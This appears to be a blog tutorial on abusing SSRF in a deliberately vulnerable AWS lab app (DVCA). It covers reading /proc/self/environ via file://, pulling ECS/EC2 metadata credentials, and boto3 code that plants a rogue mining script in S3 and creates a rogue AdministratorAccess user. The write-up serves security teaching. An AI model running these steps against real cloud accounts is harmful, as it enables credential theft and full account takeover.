Privilege escalation in the Cloud: From SSRF to Global Account Administrator

Maxime Leblanc · poka-techblog · Sep 1, 2018

In my previous stories, I explored different techniques for exploiting Server-Side Request Forgeries (SSRF), which can lead to unauthorized access to various resources inside a Web server’s internal network. In some circumstances, SSRFs can even lead to API keys or database credentials being compromised. In this story, I wish to show you that in the context of a Cloud application, the consequences of a successful attack using this technique are amplified many times over. An attacker who can effectively leverage an SSRF against the right resource could gain complete access to your AWS account, and what they can do from there is limited only by their imagination. Spin up a couple of c5.xlarge instances to mine Bitcoin? Host a malware delivery network over S3? Your choice…

The DVCA Lab Environment

For this experiment, I have developed the DVCA (Damn Vulnerable Cloud Application), which is available on GitHub and was inspired by the Damn Vulnerable Web Application project. DO NOT deploy this in your environment unless you have hardened it by restricting the security groups to your own IP and/or changing the IAM Roles defined in the project. At the time of writing, it is made of a static S3-hosted website delivered over SSL by CloudFront. You can choose whether you want a serverless backend using an API Gateway and a Lambda function, an ECS Fargate backend running a Flask container, or a classic EC2 backend running the same container. For the purpose of this article, I will concentrate on the Fargate backend.

The Damn Vulnerable Cloud Application architecture

From the outside, it all seems fine: HTTPS is active on both the frontend and the backends, and the website is static and therefore protected from classic attacks like SQL injections or WordPress plugin vulnerabilities…

The DVCA interface

The SSRF is exploited through a Webhook tester, like in my first story on the subject. All backends are coded the same way: they receive a URL, fetch it using urllib, and return the result to the frontend, which displays it in the “debugger” frame.
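Conceptually, each backend boils down to a handler like the sketch below. This is only an illustration under my own naming assumptions (the /webhook route and the url form field are hypothetical, not necessarily DVCA’s exact ones):

from urllib.request import urlopen

from flask import Flask, request

app = Flask(__name__)

@app.route('/webhook', methods=['POST'])
def webhook():
    # Fetch whatever URL the caller supplied and echo it back verbatim.
    # There is no scheme or host filtering: this is the SSRF.
    url = request.form['url']
    return urlopen(url).read()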

Roles and Permissions in AWS EC2/ECS

In order to assume a role and effectively gain permissions on AWS resources, you need three pieces of information: an AccessKey, a SecretKey and, when the credentials were issued by the Security Token Service (STS), a SessionToken. In an EC2 or ECS infrastructure, each VM/Task can have its own set of permissions; for example, if your Web application needs to upload files to an S3 Bucket, you will need to assign it the s3:PutObject permission on the bucket, as in the sketch below. This means that our Fargate containers also need to obtain credentials from STS in order to do their job, if that job involves calling AWS resources.
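In a CloudFormation-style template, such a grant might look like this (the bucket name is hypothetical):

- Effect: Allow
  Action:
    - s3:PutObject
  Resource: 'arn:aws:s3:::my-app-uploads/*' # hypothetical bucket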

In a classic EC2 scenario, the credentials for a particular instance can be fetched by the EC2 instance (and only from there, since the endpoint is not public) from the Metadata URL: http://169.254.169.254/latest/meta-data/iam/security-credentials/. Note that you can also fetch quite a lot of sensitive information from this IP, like UserData scripts that are likely to contain API keys and other secrets.
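From code running on the instance itself, fetching those credentials is a two-step read of the metadata endpoint. Here is a minimal Python sketch (the role name is simply whatever the endpoint returns):

import json
from urllib.request import urlopen

base = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
role = urlopen(base).read().decode().strip()  # name of the attached role
# The JSON document contains AccessKeyId, SecretAccessKey and Token:
creds = json.loads(urlopen(base + role).read())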

In the case of an ECS Task, the credentials can be retrieved from a different endpoint: http://169.254.170.2/v2/credentials/<SOME_UUID>. The UUID in question can be found in the container’s environment variables, more specifically in the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable.
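Inside the task, the AWS SDKs assemble the credentials URL from that variable; a minimal sketch of what they do:

import json
import os
from urllib.request import urlopen

relative_uri = os.environ['AWS_CONTAINER_CREDENTIALS_RELATIVE_URI']
# Returns a JSON document with AccessKeyId, SecretAccessKey and Token:
creds = json.loads(urlopen('http://169.254.170.2' + relative_uri).read())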

Abusing the IAM Services through SSRFs

Since these STS-issued credentials are served over plain HTTP endpoints, we can trick the Fargate backend into making arbitrary requests to them, and the frontend will happily display the result to us. But how do we find the credentials UUID needed for the request? Well, in my other SSRF story, I showed that you can read a file using the file:// scheme. So assuming the backend is a Linux-based server, you can read its environment variables by pointing your request at file:///proc/self/environ.
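Put together, the attack is just two webhook calls. Here is a sketch using requests; the backend URL and form field name are assumptions about the deployment, not fixed values:

import requests

backend = 'https://dvca.example.com/webhook'  # hypothetical deployment URL

# Step 1: leak the container's environment variables, which include
# AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.
env = requests.post(backend, data={'url': 'file:///proc/self/environ'}).text

# Step 2: have the backend query the credentials endpoint, using the
# relative URI parsed out of step 1.
relative_uri = '/v2/credentials/<SOME_UUID>'  # parsed from the environ dump
creds = requests.post(
    backend, data={'url': 'http://169.254.170.2' + relative_uri}
).text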

The relative URL for retrieving the credentials, including the UUID, can be found in /proc/self/environ

Yay! Now, we can use this URI to retrieve credentials:

Credentials retrieved from an SSRF request

Using the credentials

In order to use these credentials in a creative manner, I would suggest using boto3, the Python SDK for interacting with the AWS API. The boto3 client constructor accepts credentials as parameters, so we can pass it the ones retrieved through our SSRF:

import boto3

# access_key, secret_key and session_token come from the SSRF response:
sts_client = boto3.client(
    'sts',
    aws_access_key_id=access_key,
    aws_secret_access_key=secret_key,
    aws_session_token=session_token,
)

Now, to make sure that our credentials work and that we have effectively elevated our privileges, the STS service has an AWS equivalent of the whoami command: get-caller-identity. Let’s verify:

>>> print(sts_client.get_caller_identity()['Arn'])
arn:aws:sts::0123456789:assumed-role/DVCA-Fargate-Backend-DVCATaskRole-CLOUDFORMATION_ID/SOME_UUID

Bingo! AWS now considers my laptop to be the Fargate backend of my application, meaning I have access to everything it has access to. Regarding S3, for example, the backend ECS Task has this set of permissions defined:

- Effect: Allow
  Action:
    - s3:GetObject
    - s3:PutObject
    - s3:ListBucket
  Resource: '*' # Tip: Try to never wildcard access to resources

Now, if the domain name of the DVCA is a “root” domain (one with no subdomain), chances are that the underlying S3 Bucket has the same name as the domain, because Route53 Alias Records make it easier to work this way. We can use this to modify the static website and inject a rogue mining script into it (for example), effectively defacing the static S3 website!

s3_client = boto3.client(
    's3',
    aws_access_key_id=access_key,
    aws_secret_access_key=secret_key,
    aws_session_token=session_token,
)
# Overwrite the site's index page with our own payload:
s3_client.put_object(Body=rogue_bytes, Bucket='domain.name', Key='index.html')

Also note the s3:ListBucket permission, which enables the serverless equivalent of directory listing…
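With the credentials above, that listing is one call away; a quick sketch reusing the s3_client from the previous block:

# Enumerate every object in the bucket — the "directory listing":
for obj in s3_client.list_objects_v2(Bucket='domain.name')['Contents']:
    print(obj['Key'], obj['Size'])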

Taking over

Let’s say your Web application has the right to create roles (one role per customer, for example) and that this permission was implemented as:

- Effect: Allow
  Action:
    - iam:* # Living dangerously
  Resource: '*'

(Very dangerous, but I am sure there are plenty of way-too-permissive implementations like this in the wild.) Using the credentials retrieved through our SSRF technique and passing them to boto3, we can create a new Global Administrator user and issue Access Keys for it in just a few lines of Python:

iam_client = boto3.client(
    'iam',
    aws_access_key_id=access_key,
    aws_secret_access_key=secret_key,
    aws_session_token=session_token,
)
# Create a new user and attach the AWS-managed administrator policy:
iam_client.create_user(UserName='DVCA-RogueUser')
iam_client.attach_user_policy(
    PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess',
    UserName='DVCA-RogueUser',
)
# Issue permanent access keys for the rogue administrator:
key_response = iam_client.create_access_key(UserName='DVCA-RogueUser')

In this example, the keys will be in the key_response object, which you can simply print out.

At this point, you have won. You basically own everything in this account.

A rogue administrator user created using the backend’s credentials

Future work: The Lambda Backend

Even though I included a serverless Lambda backend in DVCA, I have not been able to exploit it yet. In this case, the credentials are injected directly into Python’s os.environ, but are not part of /proc/self/environ or /proc/self/task/1/environ. I know that they are injected at bootstrap using lambda_runtime.receive_start(), but I am not sure they can be found anywhere on the filesystem. AWS Lambdas also do not have a metadata endpoint from which we could fetch them. My next hypothesis would be to try to retrieve them from memory, by looking at the /proc/self/map* files.

So if you have an idea, drop a comment below!

Happy hacking! :-)
